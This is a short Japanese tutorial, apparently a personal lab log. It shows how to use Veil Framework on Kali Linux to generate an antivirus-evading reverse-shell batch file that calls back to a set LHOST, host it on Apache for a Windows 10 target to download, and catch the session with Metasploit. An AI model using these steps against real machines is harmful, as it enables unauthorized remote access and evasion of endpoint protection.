Veil Framework
Meterpreter セッションの確立には
ターゲット端末で実行ファイルを実行させ
アンチウイルスの検知の回避が必要
Veil Framework は
アンチウイルス回避ペイロードを生成するツール
KaliLinux にインストールするには
1 | apt install veil-evasion |
1 | veil |
で起動すると
セットアップスクリプトが実行され
1 2 3 | [?] Are you sure you wish to install Veil? Continue with installation? ([y]es/[s]ilent/[N]o): |
となり
インストールモードを選ぶので
s を入力し Enter
インストールが終わって
veil >
と表示されたら
1 | exit |
で一度終了しておく
再度
1 | veil |
で起動し
Veil を最新化するために
1 | update |
でVeil を最新化する
現在使えるツールは
Evasion
Ordnance
の2つ
アンチウイルスを回避するツールを使うなら
Evasion なので
1 | use 1 |
ペイロードリストをみたいのなら
1 | list |
を実行するとみれる
今回はこの中から22のものを使うので
1 | use 22 |
を実行
どのようなツールかは
Description の項目にかかれている
これはリバースシェルなので
KaliLinux のIPをセット
1 | set lhost 192.168.1.134 |
次にペイロードの作成
1 | generate |
を実行
するとファイル名を指定できるので
evil3
としておく
1 | Hit enter to continue... |
となったら Enter
これで作成はできたので
1 | exit |
で一度終了
ここで作成できたファイルは
一度デスクトップへコピーしておく
1 | cp /var/lib/veil/output/source/evil3.bat /root/Desktop/ |
1 2 | cp /root/Desktop/evil3.bat /var/www/html/share/service apache2 restart |
でダウンロードできるようにしておく
次にリバースシェルの待受設定
1 | msfconsole |
で Metasploit を起動
これで Windows10 でブラウザから
evil3 をダウンロードし
実行すると
コマンドプロンプトが立ち上がり
セッションが確立される
ただしリアルタイム保護が有効化されていると
ダウンロードもできないし
実行時に検知されセッションは確立できない